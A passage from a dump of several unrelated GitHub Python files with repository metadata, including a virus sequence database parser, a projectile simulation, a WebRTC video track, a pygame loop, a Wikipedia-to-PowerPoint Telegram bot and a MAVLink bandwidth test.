st[-1] == '.':\n st = st[:-1].strip()\n if not strain:\n strain = st\n else:\n if strain != st:\n strain = strain + ' or ' + st\n return isolate, strain\n\n\ndef parse_GB_note(note):\n # print('Note=', note)\n genotype, subtype = None, None\n for n in note.split(';'):\n m = n.split() #\n if len(m) == 1:\n m = m[0].split(':')\n if len(m) == 1:\n m = m[0].split('-')\n if m[0].lower().startswith ('genotype'):\n genotype = m[1].strip()\n elif m[0].lower().startswith ('subtype'):\n subtype = m[1].strip()\n return genotype, subtype\n\n\ndef parse_date(date :str):\n L=len(date)\n\n try:\n\n if L == 11 : # 02-Mar-2010\n d=datetime.datetime.strptime(date, '%d-%b-%Y')\n return d.year, d.month, d.day\n\n elif L == 4 : # 2011\n return date, None, None\n\n elif L == 8 : # Sep-2011\n d=datetime.datetime.strptime(date, '%b-%Y')\n return d.year, d.month, None\n\n elif L == 9:\n d=date.split('/')[0] # 2013/2014\n return d, None, None\n\n elif L == 10 : # 2016-05-12\n d=datetime.datetime.strptime(date, '%Y-%m-%d')\n return d.year, d.month, d.day\n\n elif L == 7 : # 2016-05\n d=datetime.datetime.strptime(date, '%Y-%m')\n return d.year, d.month, None\n\n elif L == 3 : # Sep ???????\n d=datetime.datetime.strptime(date, '%b')\n return None, d.month, None\n\n else:\n raise ValueError\n\n except ValueError:\n print('Unable to parse date: ', date, ' of length ', len(date) )\n return None, None, None\n\ndef parse_source(host:str, source:str):\n s = None\n h = None\n o = None\n if host:\n o= host.lower()\n if source:\n source: source = source.lower()\n o += source\n else:\n if source:\n source: source = source.lower()\n o = source\n else: return None, None\n\n\n\n if any(syn in o for syn in ['huma', 'homo sapiens', 'patient', 'donor', 'clinical' ]):\n h = 'human'\n elif any(syn in o for syn in ['boar', 'sus scrofa']): # wild boar\n if 'sus scrofa domesticus' in o:\n h = 'swine'\n else:\n h = 'wild boar'\n elif any(syn in o for syn in ['swine', 'pig', 'porcine', 'pork', 'sus scrofa domesticus', 'figatellu']):\n h = 'swine'\n elif any(syn in o for syn in ['rattus', 'rat']): # Rattus flavipectus?? =Rattus tanezumi\n h = 'rat'\n elif any(syn in o for syn in ['bandicota indica']): # greater bandicoot rat (Bandicota indica) is a species of rodent in the family Muridae found in Bangladesh, China,\n h = 'Bandicota indica'\n elif any(syn in o for syn in ['goat']): # cabra, Capra aegagrus hircus\n h = 'goat'\n elif any(syn in o for syn in ['ferret', 'mustela putorius furo']):\n h = 'ferret'\n elif any(syn in o for syn in ['mustela putorius']):\n h = 'polecat'\n elif any(syn in o for syn in ['Vulpes vulpes', 'fox']): # red fox (Vulpes vulpes), largest of the true foxes,\n h = 'fox'\n elif any(syn in o for syn in ['breadcrumb sponge', 'halichondria panicea']):\n h = 'sponge'\n elif any(syn in o for syn in ['treeshrew', 'tree shrew']):\n h = 'treeshrew'\n elif any(syn in o for syn in ['shrew', 'suncus murinus']): # Asian house shrew (Suncus murinus) grey musk shrew, Asian musk shrew, or money shrew is a widespread, adaptable species of shrew\n h = 'shrew'\n elif any(syn in o for syn in ['oryctolagus cuniculus', 'rabbit']):\n h = 'rabbit'\n elif any(syn in o for syn in ['chicken', 'hens']):\n h = 'chicken'\n elif any(syn in o for syn in ['gallus gallus']): # red junglefowl (Gallus gallus) is a tropical member of the family Phasianidae. It is the primary progenitor of the domestic chicken\n h = 'Gallus gallus'\n elif any(syn in o for syn in ['monkey', 'Macaca mulatta']):\n h = 'monkey'\n elif any(syn in o for syn in ['cattle', 'cow']):\n h = 'cattle'\n elif any(syn in o for syn in ['tiger']):\n h = 'tiger'\n elif any(syn in o for syn in ['roe deer']): # venado, Capreolus capreolus), also known as the western roe deer, chevreuil, or simply roe deer or roe\n h = 'roe deer'\n elif any(syn in o for syn in ['moose', 'alces alces']): # moose (North America) or elk (Eurasia), Alces alces, is the largest extant species in the deer family\n h = 'moose'\n elif any(syn in o for syn in ['red deer']): # venado, red deer (Cervus elaphus)\n h = 'red deer'\n elif any(syn in o for syn in ['deer']): # venado,\n h = 'deer'\n elif any(syn in o for syn in ['camelus']): # Bactrian camel\n h = 'camel'\n elif any(syn in o for syn in ['thrush']): # Turdidae, of passerine birds\n h = 'thrush'\n elif any(syn in o for syn in ['feral pigeon']): # palomas, feral pigeons (Columba livia domestica), city doves, city pigeons, street pigeons, or flying rats\n h = 'feral pigeon'\n elif any(syn in o for syn in ['buzzard']): # buzzard is the common name of several species of bird of prey:\n h = 'buzzard'\n elif any(syn in o for syn in ['owl']): # Owls are birds from the order Strigiformes\n h = 'owl'\n elif any(syn in o for syn in ['sheep', 'ovine']): # sheep (Ovis aries)\n h = 'sheep'\n elif any(syn in o for syn in ['falco']): # common kestrel (Falco tinnunculus) is a bird of prey species belonging to the kestrel group of the falcon family Falconidae.\n h = 'falcon'\n elif any(syn in o for syn in ['mystacina tuberculata',\n 'vampyrodes caraccioli',\n 'rhinolophus ferrumequinum',\n 'myotis',\n 'eptesicus serotinus',\n 'hipposideros abae']): # serotine bat (Eptesicus serotinus), also known as the common serotine bat, big brown bat or silky bat -- lesser short-tailed bat (Mystacina tuberculata) – pekapeka-tou-poto in Māori – is the only living species of bat in the family Mystacinidae,[1] and is endemic to New Zealand.\n h = 'bat'\n elif any(syn in o for syn in ['arctocephalus australis']): # South American fur seal (Arctocephalus australis)\n h = 'seal'\n elif any(syn in o for syn in ['vulture']): # Himalayan vulture or Himalayan griffon vulture (Gyps himalayensis) is an Old World vulture in the family Accipitridae.\n h = 'vulture'\n elif any(syn in o for syn in ['dolphin']): #\n h = 'dolphin'\n elif any(syn in o for syn in ['bos grunniens']): #\n h = 'yak'\n elif any(syn in o for syn in ['mink', 'neovison vison']): #\n h = 'mink'\n elif any(syn in o for syn in ['egret']): # little egret (Egretta garzetta)\n h = 'egret'\n elif any(syn in o for syn in ['ruditapes philippinarum', 'scapharca subcrenata', 'anadara granosa']): #\n h = 'clam'\n elif any(syn in o for syn in ['mytilus galloprovincialis']): #\n h = 'mussel'\n elif any(syn in o for syn in ['oyster']): #\n h = 'oyster'\n elif any(syn in o for syn in ['Felis catus']): #\n h = 'cat'\n elif any(syn in o for syn in ['trout']): # brook trout, cutthroat brook\n h = 'trout'\n elif any(syn in o for syn in ['herpestes javanicus', 'mongoose']): #\n h = 'mongoose'\n elif any(syn in o for syn in ['horse']): #\n h = 'horse'\n elif any(syn in o for syn in ['leopard']): #\n h = 'leopard'\n elif any(syn in o for syn in ['bear']): #\n h = 'bear'\n elif any(syn in o for syn in ['crowned crane']): #\n h = 'crowned crane'\n elif any(syn in o for syn in ['pheasant']): #\n h = 'pheasant'\n\n\n\n\n if not source: return h, None\n\n\n\n if any(syn in source for syn in ['sera', 'serum']):\n s = 'sera'\n elif any(syn in source for syn in ['plasma']):\n s = 'plasma'\n elif any(syn in source for syn in ['liver', 'figatellu']):\n s = 'liver'\n elif any(syn in source for syn in ['feces',\n 'anal swab',\n 'manure',\n 'stool',\n 'fecal',\n 'intestinal content',\n 'caecal contents',\n 'fecces']):\n s = 'feces'\n elif any(syn in source for syn in ['bile', 'gall']):\n s = 'bile'\n elif any(syn in source for syn in ['milk']):\n s = 'milk'\n elif any(syn in source for syn in ['blood']):\n s = 'blood'\n elif any(syn in source for syn in ['brain']):\n s = 'brain'\n elif any(syn in source for syn in ['heart']):\n s = 'heart'\n elif any(syn in source for syn in ['kidney']):\n s = 'kidney'\n elif any(syn in source for syn in ['spleen']):\n s = 'spleen'\n elif any(syn in source for syn in ['urine']):\n s = 'urine'\n elif any(syn in source for syn in ['nares']):\n s = 'nares'\n elif any(syn in source for syn in ['colon']):\n s = 'colon'\n elif any(syn in source for syn in ['egg']):\n s = 'egg'\n elif any(syn in source for syn in ['sausage']):\n s = 'sausage'\n elif any(syn in source for syn in ['flesh', 'pork', 'sausage', 'muscle', 'meat']):\n s = 'muscle'\n elif any(syn in source for syn in ['cerebrospinal fluid', 'csf']):\n s = 'CSF'\n elif any(syn in source for syn in ['sewage', 'effluent', 'slurry']): # ????? feces ??\n s = 'sewage'\n elif any(syn in source for syn in ['river']): # ?????\n s = 'river water'\n elif any(syn in source for syn in ['culture supernatant', 'cell culture', 'hepatocytes']): # ?????\n s = 'cell culture'\n elif any(syn in source for syn in ['pool']): # ?????\n s = 'pool'\n elif any(syn in source for syn in ['soil']): # ?????\n s = 'soil'\n elif any(syn in source for syn in ['swab']): # ?????\n s = 'swab'\n elif any(syn in source for syn in ['wastewater', 'slaughterhouse']): # ?????\n s = 'wastewater'\n elif any(syn in source for syn in ['water']): # ?????\n s = 'water'\n elif any(syn in source for syn in ['strawberry']): # ?????\n s = 'strawberry'\n\n return h, s\n\n\ndef create_all( ):\n\n newly = True # False\n country = True # False\n\n print('Creating db BioSQL...')\n\n# dbBioSQL=createBioSQL(newly)\n\n\n\n print('Creating db...')\n sdb = create(newly)\n\n if newly or country:\n read_country_codes(sdb)\n\n ref_name = \"M73218\"\n if newly:\n print('Parsing GB_flat_file...')\n # parseGB(sdb, r'C:/Prog/HEV/data/temp/HEV-g3marked_all_2017-09-27. 577 seq.sequence.gb')\n parseGB(sdb, r'../data/temp/HEV_all.sequence.gb')\n print('Parsing the big alignment...')\n ID_align, ref = parse_full_fasta_Align(sdb, ref_name,'../alignment/HEV.fas')\n print(ref)\n else:\n print('Cleaning parsed Excel...')\n clean_parsed_Excel(sdb)\n ID_align=1 # ??\n\n print('Calcule reference positions...')\n ref = ref_pos(sdb, ID_align, ref_name) # , ref_name\n print(ref)\n\n print('Parse the Excel file table...')\n parse_HEV_xlsm(sdb, '../data/temp/HEVsubtypingMEGAut - Kopie.xlsm')\n\n print('Done !!!')\n sdb.close()\n\n # \"\"\"\n\n\nif __name__ == '__main__':\n create_all( )\n\n# exit(0)\n# \"\"\"\n","repo_name":"qPCR4vir/HEV","sub_path":"python/seq_sql.py","file_name":"seq_sql.py","file_ext":"py","file_size_in_byte":65085,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"8852448648","text":"import math\r\n\r\n# Variabel Input\r\nd = 6e-2 #meter\r\nm = 0.1 #kg\r\nv0 = 25 #m/s\r\nelv = 37 #derajat\r\ncd = 0.46\r\nrho = 1.2\r\ng = 9.8\r\nh = 0.05\r\nt = 0.0\r\ntmax = 2.85\r\nxFN = 0.0\r\nyFN = 0.0\r\n\r\n# Menghitung Nilai\r\nK = (cd*rho*math.pi*d**2)/(8*m)\r\nvFNx = v0*math.cos(math.radians(elv))\r\nvFNy = v0*math.sin(math.radians(elv))\r\n\r\n# Print nilai\r\nprint('xFN','yFN')\r\n\r\n# Looping\r\nwhile yFN>=0:\r\n v = math.sqrt(vFNx**2 + vFNy**2)\r\n aFNx = -K*v*vFNx\r\n aFNy = -g-K*v*vFNy\r\n\r\n # Metode FN\r\n xhalf = xFN + vFNx *h/2\r\n yhalf = yFN + vFNy *h/2\r\n vxhalf = vFNx + aFNx *h/2\r\n vyhalf = vFNy + aFNy *h/2\r\n vhalf = math.sqrt(vxhalf**2 + vyhalf**2)\r\n axhalf = -K * vhalf * vxhalf\r\n ayhalf = -g -K * vhalf * vyhalf\r\n xFN += h*vxhalf\r\n yFN += h* vyhalf\r\n vFNx += h * axhalf\r\n vFNy += h * ayhalf\r\n t += h\r\n\r\n # Print data\r\n print(xFN,yFN)","repo_name":"Hrryisndr/Fisika-Komputasi","sub_path":"Perb_feyman&Euler.py","file_name":"Perb_feyman&Euler.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28274356329","text":"import cv2\nfrom av import VideoFrame\nimport numpy as np\nimport json\n\nfrom aiortc import MediaStreamTrack, RTCPeerConnection, RTCSessionDescription\nfrom aiortc.contrib.media import MediaBlackhole, MediaPlayer, MediaRecorder\n\nimport multiprocessing as mp\nfrom multiprocessing import shared_memory as shm\n\nfrom . import (\n put_to_shm,\n get_from_shm,\n)\n\nimport logging\n# import auxiliary_module\n\n# create logger with 'spam_application'\nlogger = logging.getLogger('server')\nlogger.setLevel(logging.DEBUG)\n# create file handler which logs even debug messages\nfh = logging.FileHandler('server.log')\nfh.setLevel(logging.DEBUG)\nlogger.addHandler(fh)\n\n\n\nclass VideoTransformTrack(MediaStreamTrack):\n \"\"\"\n A video stream track that transforms frames from an another track.\n \"\"\"\n\n kind = \"video\"\n p_in = None\n shm_size = 10\n shm_current_frame = shm.SharedMemory(create=True, size=1024 * 1024 * shm_size)\n shm_transformed_frame = shm.SharedMemory(create=True, size=1024 * 1024 * shm_size)\n\n def __init__(self, track, frame_lock, *, params):\n super().__init__() # don't forget this!\n self.workers = {}\n self.track = track\n self.transform = params['video_transform']\n self.count = 0\n self.transformer_pid = None\n self.frame_lock = frame_lock\n\n async def recv(self):\n frame = await self.track.recv()\n self.count += 1\n\n self.frame_lock.acquire()\n put_to_shm(frame, self.shm_current_frame.name)\n self.frame_lock.release()\n\n current_frame = frame.to_ndarray(format=\"bgr24\")\n # logger.info(f\"current_frame.shape: {current_frame.shape}\")\n\n if self.count % 10 == 0:\n self.p_in.send(\n {\n \"shape\": current_frame.shape,\n \"dtype\": current_frame.dtype,\n \"video_transform\": self.transform,\n }\n )\n\n self.frame_lock.acquire()\n transformed_image = get_from_shm(self.shm_transformed_frame.name, shape=current_frame.shape)\n self.frame_lock.release()\n\n new_frame = VideoFrame.from_ndarray(transformed_image, format=\"bgr24\")\n new_frame.pts = frame.pts\n new_frame.time_base = frame.time_base\n\n return new_frame\n\n\n\n","repo_name":"mf523/video-stream-bridge","sub_path":"src/backend/track.py","file_name":"track.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70350206444","text":"from os import environ\n#Remove 'Hello from the pygame community. https://www.pygame.org/contribute.html' text from console\nenviron['PYGAME_HIDE_SUPPORT_PROMPT'] = '1'\nimport pygame as pg\n\n#Logger\ndef Debug(Value):\n data = \"\"\n with open(\"logs/debug.txt\") as debugFile:\n data = debugFile.read()\n with open(\"logs/debug.txt\", 'w') as debugFile:\n debugFile.write(data + \"\\n\" + str(Value))\n\nif __name__ == \"__main__\":\n #Initialise game engine\n pg.init()\n\n #Window settings\n winX = 800\n winY = 800\n winSize = winX, winY\n #Position to middle\n environ['SDL_VIDEO_WINDOW_POS'] = '%i,%i' % (0,0)\n environ['SDL_VIDEO_CENTERED'] = '0'\n win = pg.display.set_mode(winSize, pg.NOFRAME)\n\n #Main loop active\n Run = True\n\n #Limit Frame per sec\n Clock = pg.time.Clock()\n\n def image(png):\n img = pg.image.load(\"assets/img/\" + png)\n return img\n\n #Loading assets\n def LoadAssets():\n Dictionary = {\n \"1\":image(\"background/01.png\"),\n \"exit0\":image(\"exit/exitX00.png\"),\n \"exit1\":image(\"exit/exitX01.png\"),\n \"player\":{\n \"headIdle\":{\n 0:image(\"player/headIdle00.png\"),\n 1:image(\"player/headIdle01.png\"),\n 2:image(\"player/headIdle02.png\"),\n 3:image(\"player/headIdle00.png\"),\n 4:image(\"player/headIdle00.png\"),\n },\n #\"\":image(\".png\"),\n #\"\":image(\".png\"),\n \"tail\":image(\"player/tail00.png\"),\n \"tailEnd\":image(\"player/tailEnd00.png\"),\n } \n }\n return Dictionary\n try:\n Asset = LoadAssets()\n except Exception as exp:\n Debug(\"Couldn't load assets. \" + str(exp))\n\n #user events\n usereventDic = {\"playerAnimation\":pg.USEREVENT # 24\n }\n eventTimerDic = {\"playerAnimation\": 200}\n for dic in usereventDic:\n pg.time.set_timer(usereventDic[dic], eventTimerDic[dic])\n\n #Hover\n exitHover = False\n\n #>| Background |<\n posX = 0\n posY = 0\n def backgroundCheck(var):\n if var == \"both\":\n if posX <= 32:\n posX += 1\n else: \n posX = 0\n if posY <= 32:\n posY += 1\n else: \n posY = 0\n elif var == \"y\":\n if posY <= 32:\n posY += 1\n else: \n posY = 0\n elif var == \"x\":\n if posX <= 32:\n posX += 1\n else: \n posX = 0\n else:\n if posX <= 32:\n pass\n else: \n posX = 0\n if posY <= 32:\n pass\n else: \n posY = 0\n\n #Drawing method\n def Draw():\n #Background\n for i in range(int(winX / 32 + 2)):\n for ii in range(int(winY / 32 + 2)):\n win.blit(Asset[\"1\"], ((-32 + posX + 32 * i),(-32 + posY + 32 * ii)))\n \n if exitHover == True:\n win.blit(Asset[\"exit1\"], (winX - 32 ,0))\n else:\n win.blit(Asset[\"exit0\"], (winX - 32 ,0))\n\n #Update display\n pg.display.update()\n \n #Main loop\n while Run:\n #Mouse position\n mousePos = pg.mouse.get_pos()\n #Mouse button\n mouseButton = pg.mouse.get_pressed()\n\n #Event handler\n for event in pg.event.get():\n if event.type == pg.QUIT: \n Run = False\n if mousePos[0] > winX - 30 and mousePos[0] < winX and mousePos[1] > 0 and mousePos[1] < 30:\n exitHover = True\n if mouseButton[0] != 0:\n Run = False\n else:\n exitHover = False\n \n \n Draw()\n Clock.tick(60)\n \n #Shutdown\n pg.quit()\n\nelse:\n Debug(\"!! -- !! -- !!\")","repo_name":"TheMikkoz/Underground","sub_path":"Underground.py","file_name":"Underground.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10678845844","text":"import requests\r\nimport telebot\r\nimport glob\r\nfrom PIL import Image, ImageSequence\r\nfrom bs4 import BeautifulSoup\r\nfrom pptx import Presentation\r\nfrom os import remove, path\r\nfrom time import sleep\r\n\r\n\r\ntoken = \"-\"\r\nparsed_text = [[]]\r\nparsed_titles = []\r\ntitle_black_list = [\"Классификация\", \"Аксессуары\", \"Примечания\", \"Литература\", \"Литература по теме\", \"Ссылки\",\r\n \"Галерея\", \"Специализирующиеся производители\", \"См. также\", \"Награды\", \"Города-побратимы\"]\r\nWIKI_URL = \"https://ru.wikipedia.org/wiki/\"\r\nmax_text_len = 1100\r\nmax_links = 600\r\nmp_error = False\r\nactual_content = {}\r\nnumber_of_slides = 0\r\n\r\n\r\ndef wiki_parser(url):\r\n global parsed_text, parsed_titles\r\n\r\n q = requests.get(url)\r\n result = q.content\r\n soup = BeautifulSoup(result, \"lxml\")\r\n\r\n all_info = soup.find(class_=\"mw-parser-output\")\r\n\r\n title_count = 0\r\n\r\n for child in all_info.children:\r\n if child.name == \"p\" and not isinstance(child, str):\r\n try:\r\n text = child.text\r\n if text == \"#invoke:Navbox\\n\" or \"См. также:\" in text:\r\n continue\r\n for i in range(1, max_links):\r\n text = text.replace(f\"[{i}]\", \"\").replace(f\"[комм. {i}]\", \"\")\r\n if text[-1] == \":\":\r\n text = text[:-1] + \".\"\r\n parsed_text[title_count].append(text)\r\n except:\r\n continue\r\n elif child.name == \"h2\" and not isinstance(child, str):\r\n text = child.text.replace(\"[править | править код]\", \"\").replace(\"[значимость факта?]\", \"\")\r\n parsed_titles.append(text)\r\n title_count += 1\r\n parsed_text.append([])\r\n elif child.name == \"div\" or child.name == \"table\":\r\n try:\r\n content_class = child.get(\"class\")\r\n if title_count:\r\n actual_title = parsed_titles[-1]\r\n if actual_title not in actual_content and \"thumb\" in content_class or \"infobox\" in content_class:\r\n content_href = \"https:\"+child.find(\"img\").get(\"src\")\r\n content_type = content_href[-3:]\r\n r = requests.get(content_href)\r\n content_name = f\"{actual_title}.{content_type}\"\r\n with open(f\"data/{content_name}\", \"bw\") as f:\r\n f.write(r.content)\r\n actual_content[actual_title] = content_name\r\n else:\r\n actual_title = 0\r\n if actual_title not in actual_content and \"thumb\" in content_class or \"infobox\" in content_class:\r\n content_href = \"https:\"+child.find(\"img\").get(\"src\")\r\n content_type = content_href[-3:]\r\n r = requests.get(content_href)\r\n content_name = f\"{actual_title}.{content_type}\"\r\n with open(f\"data/{content_name}\", \"bw\") as f:\r\n f.write(r.content)\r\n actual_content[actual_title] = content_name\r\n except:\r\n continue\r\n\r\n for text in parsed_text:\r\n for p in text:\r\n if p != \"\\n\":\r\n break\r\n else:\r\n local_ind = parsed_text.index(text)\r\n if local_ind != 0:\r\n del parsed_text[local_ind]\r\n del parsed_titles[local_ind-1]\r\n while True:\r\n if [] in parsed_text:\r\n ind = parsed_text.index([])\r\n del parsed_text[ind]\r\n del parsed_titles[ind-1]\r\n else:\r\n break\r\n\r\n\r\ndef clean_trash():\r\n for title in parsed_titles:\r\n ind = parsed_titles.index(title)+1\r\n if \"Известные\" in title:\r\n del parsed_text[ind]\r\n del parsed_titles[ind-1]\r\n if title in title_black_list:\r\n all_text = \"\"\r\n for text in parsed_text[ind]:\r\n all_text += text\r\n if len(all_text) < 50:\r\n del parsed_text[ind]\r\n del parsed_titles[ind-1]\r\n\r\n\r\ndef thumbnails(frames):\r\n for frame in frames:\r\n thumbnail = frame.copy()\r\n thumbnail.thumbnail(size, Image.ANTIALIAS)\r\n yield thumbnail\r\n\r\n\r\ndef content_resize():\r\n for key in actual_content.keys():\r\n try:\r\n correct_dir = f\"data/{actual_content[key]}\"\r\n content = Image.open(correct_dir)\r\n x, y = content.size\r\n\r\n if y / x != 10 / 6.7:\r\n if x > y:\r\n new_x = x\r\n new_y = int(x * 1.49)\r\n\r\n elif x < y or x == y:\r\n new_x = int(y / 1.49)\r\n new_y = y\r\n\r\n if actual_content[key][-3:] == \"gif\":\r\n frames = ImageSequence.Iterator(content)\r\n frames = thumbnails(frames)\r\n gif_content = next(frames)\r\n gif_content.info = content.info\r\n gif_content.save(correct_dir, save_all=True, append_images=list(frames))\r\n\r\n else:\r\n result = content.crop((0, 0, x, y)).resize((new_x, new_y))\r\n result.save(correct_dir)\r\n\r\n except:\r\n continue\r\n\r\n\r\n\r\ndef delete_slide(index):\r\n global prs\r\n xml_slides = prs.slides._sldIdLst # pylint: disable=W0212\r\n slides = list(xml_slides)\r\n xml_slides.remove(slides[index])\r\n\r\n\r\ndef presentation_maker():\r\n global actual_content, prs, number_of_slides\r\n\r\n clean_trash()\r\n content_resize()\r\n\r\n try:\r\n prs = Presentation(\"sample.pptx\")\r\n except:\r\n prs = Presentation()\r\n\r\n first_slide_layout = prs.slide_layouts[0]\r\n first_slide = prs.slides.add_slide(first_slide_layout)\r\n first_count = 0\r\n slides_with_error = []\r\n\r\n for shape in first_slide.shapes:\r\n if not shape.has_text_frame:\r\n continue\r\n if not first_count:\r\n shape.text = theme\r\n first_count += 1\r\n else:\r\n shape.text = f\"Подготовил {name}\"\r\n\r\n second_slide_layout = prs.slide_layouts[1] if 0 not in actual_content else prs.slide_layouts[8]\r\n second_slide = prs.slides.add_slide(second_slide_layout)\r\n if second_slide_layout == prs.slide_layouts[8]:\r\n try:\r\n placeholder = second_slide.placeholders[1]\r\n placeholder.insert_picture(f\"data/{actual_content[0]}\")\r\n except:\r\n slides_with_error.append(1)\r\n second_slide_layout = prs.slide_layouts[1]\r\n second_slide = prs.slides.add_slide(second_slide_layout)\r\n\r\n second_count = 0\r\n for shape in second_slide.shapes:\r\n if not shape.has_text_frame:\r\n continue\r\n elif not second_count:\r\n shape.text = theme\r\n second_count += 1\r\n else:\r\n text = \"\\n\".join(parsed_text[0])\r\n if len(text) > max_text_len:\r\n symbol_counter = -1\r\n for symbol in text:\r\n symbol_counter += 1\r\n if symbol == \".\":\r\n dot_ind = symbol_counter\r\n if symbol_counter > max_text_len:\r\n break\r\n text = text[:dot_ind+1]\r\n shape.text = text\r\n\r\n for title in parsed_titles:\r\n slide_layout = prs.slide_layouts[1] if title not in actual_content else prs.slide_layouts[8]\r\n title_ind = parsed_titles.index(title)\r\n slide = prs.slides.add_slide(slide_layout)\r\n if slide_layout == prs.slide_layouts[8]:\r\n try:\r\n placeholder = slide.placeholders[1]\r\n placeholder.insert_picture(f\"data/{actual_content[title]}\")\r\n except:\r\n slides_with_error.append(title_ind+2)\r\n slide_layout = prs.slide_layouts[1]\r\n slide = prs.slides.add_slide(slide_layout)\r\n\r\n local_count = 0\r\n for shape in slide.shapes:\r\n if not shape.has_text_frame:\r\n continue\r\n elif not local_count:\r\n shape.text = title\r\n local_count += 1\r\n else:\r\n text = \"\\n\".join(parsed_text[title_ind+1])\r\n if len(text) > max_text_len:\r\n symbol_counter = -1\r\n for symbol in text:\r\n symbol_counter += 1\r\n if symbol == \".\":\r\n dot_ind = symbol_counter\r\n if symbol_counter > max_text_len:\r\n break\r\n text = text[:dot_ind+1]\r\n shape.text = text\r\n local_count = 0\r\n\r\n for slide_with_error_ind in slides_with_error:\r\n delete_slide(slide_with_error_ind)\r\n\r\n prs.save(f'{theme}.pptx')\r\n number_of_slides = len(prs.slides)\r\n print(\"Количество слайдов:\", number_of_slides)\r\n\r\n\r\n\r\ndef make_presentation():\r\n global mp_error, actual_content\r\n\r\n try:\r\n #Забираю данные с Википедии\r\n wiki_parser(WIKI_URL+theme.replace(\" \", \"_\"))\r\n print(\"Парсинг завершён\")\r\n\r\n #Создаю презентацию\r\n presentation_maker()\r\n except:\r\n mp_error = True\r\n\r\n actual_content = {}\r\n files = glob.glob(\"data/*\")\r\n for file in files:\r\n remove(file)\r\n\r\n\r\ndef telegram_bot(token):\r\n global bot\r\n print(\"Бот запущен\")\r\n bot = telebot.TeleBot(token, threaded=False)\r\n\r\n @bot.message_handler(commands=[\"start\"])\r\n def start_message(message):\r\n try:\r\n bot.send_message(message.chat.id, \"Укажите в первой строчке тему, а во второй имя автора\")\r\n except:\r\n print(\"Ошибка отправки(Стартовое сообщение)\")\r\n\r\n @bot.message_handler(content_types=[\"text\"])\r\n def send_text(message):\r\n global theme, name, parsed_text, parsed_titles, mp_error\r\n\r\n if message.text.count(\"\\n\") == 1:\r\n theme, name = message.text.split(\"\\n\")\r\n print(f\"\\n{theme} ////// {name}\")\r\n make_presentation()\r\n if mp_error:\r\n try:\r\n bot.send_message(message.chat.id, \"Извините, у нас технические шоколадки. Пожалуйста, попробуйте позже\")\r\n except:\r\n print(\"Ошибка отправки(Оповещение о несозданной презентации)\")\r\n print(\"Ошибка создания презентации\")\r\n mp_error = False\r\n else:\r\n file = open(f\"{theme}.pptx\", \"rb\")\r\n try:\r\n bot.send_document(message.chat.id, file)\r\n bot.send_message(message.chat.id, f\"Количество слайдов: {number_of_slides}\")\r\n print(\"Успешно\")\r\n except:\r\n print(\"Ошибка отправки(Презентация)\")\r\n file.close()\r\n remove(f\"{theme}.pptx\")\r\n parsed_text, parsed_titles = [[]], []\r\n else:\r\n try:\r\n bot.send_message(message.chat.id, \"Кажется, что-то пошло не так. Пожалуйста, проверьте форму указанных данных\")\r\n except:\r\n print(\"Ошибка отправки(Оповещение о неправильной форме указанных данных)\")\r\n\r\n bot.polling()\r\n\r\nif __name__ == \"__main__\":\r\n telegram_bot(token)\r\n","repo_name":"Jative/Auto-pptx-telegram-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74453615082","text":"#!/usr/bin/env python\n\n'''\ncheck bandwidth of link\n'''\nfrom __future__ import print_function\nimport time\n\nfrom pymavlink import mavutil\n\n#using argparse to receive options from the command line\nfrom argparse import ArgumentParser\nparser = ArgumentParser(description=__doc__)\n\nparser.add_argument(\"--baudrate\", type=int,\n help=\"master port baud rate\", default=115200)\nparser.add_argument(\"--device\", required=True, help=\"serial device\")\nargs = parser.parse_args()\n\n### MAV related code starts here ###\n\n# create a mavlink serial instance\nmaster = mavutil.mavlink_connection(args.device, baud=args.baudrate)\n\nt1 = time.time()\n\ncounts = {}\n\nbytes_sent = 0\nbytes_recv = 0\n\nwhile True:\n #send some messages to the target system with dummy data\n master.mav.heartbeat_send(1, 1)\n master.mav.sys_status_send(1, 2, 3, 4, 5, 6, 7)\n master.mav.gps_raw_send(1, 2, 3, 4, 5, 6, 7, 8, 9)\n master.mav.attitude_send(1, 2, 3, 4, 5, 6, 7)\n master.mav.vfr_hud_send(1, 2, 3, 4, 5, 6)\n\n #Check for incoming data on the serial port and count\n #how many messages of each type have been received\n while master.port.inWaiting() > 0:\n #recv_msg will try parsing the serial port buffer\n #and return a new message if available\n m = master.recv_msg()\n\n if m is None: break #No new message\n \n if m.get_type() not in counts:\n #if no messages of this type received, add this type to the counts dict\n counts[m.get_type()] = 0\n\n counts[m.get_type()] += 1\n\n #Print statistics every second\n t2 = time.time()\n if t2 - t1 > 1.0:\n print(\"%u sent, %u received, %u errors bwin=%.1f kB/s bwout=%.1f kB/s\" % (\n master.mav.total_packets_sent,\n master.mav.total_packets_received,\n master.mav.total_receive_errors,\n 0.001*(master.mav.total_bytes_received-bytes_recv)/(t2-t1),\n 0.001*(master.mav.total_bytes_sent-bytes_sent)/(t2-t1)))\n bytes_sent = master.mav.total_bytes_sent\n bytes_recv = master.mav.total_bytes_received\n t1 = t2\n","repo_name":"ArduPilot/pymavlink","sub_path":"examples/bwtest.py","file_name":"bwtest.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","stars":392,"dataset":"github-code","pt":"19"} +{"seq_id":"42424627976","text":"\"\"\"Main testing script for the composite outcome experiment. Purpose is to determine whether using composite outcomes improves DL performance for prognosis\r\n\r\nUsage:\r\n run_model.py [--checkFiles] [--modelarch=MODELARCH] [--type=TYPE] [--dataframe=DF] [--target=TARGET] [--split=SPLIT] [--size=SIZE] [--saliency=SAL_DIR]\r\n run_model.py (-h | --help)\r\nExamples:\r\n run_model.py /path/to/images /path/to/model /path/to/write/output.csv\r\nOptions:\r\n -h --help Show this screen.\r\n --modelarch=MODELARCH CNN model architecture to train [default: Resnet34]\r\n --type=TYPE Type of output [default: Discrete]\r\n --dataframe=DF Optional data frame to select which images are of interest [default: None]\r\n --target=TARGET If optional df is specified, then need to include the target variable [default: None]\r\n --split=SPLIT 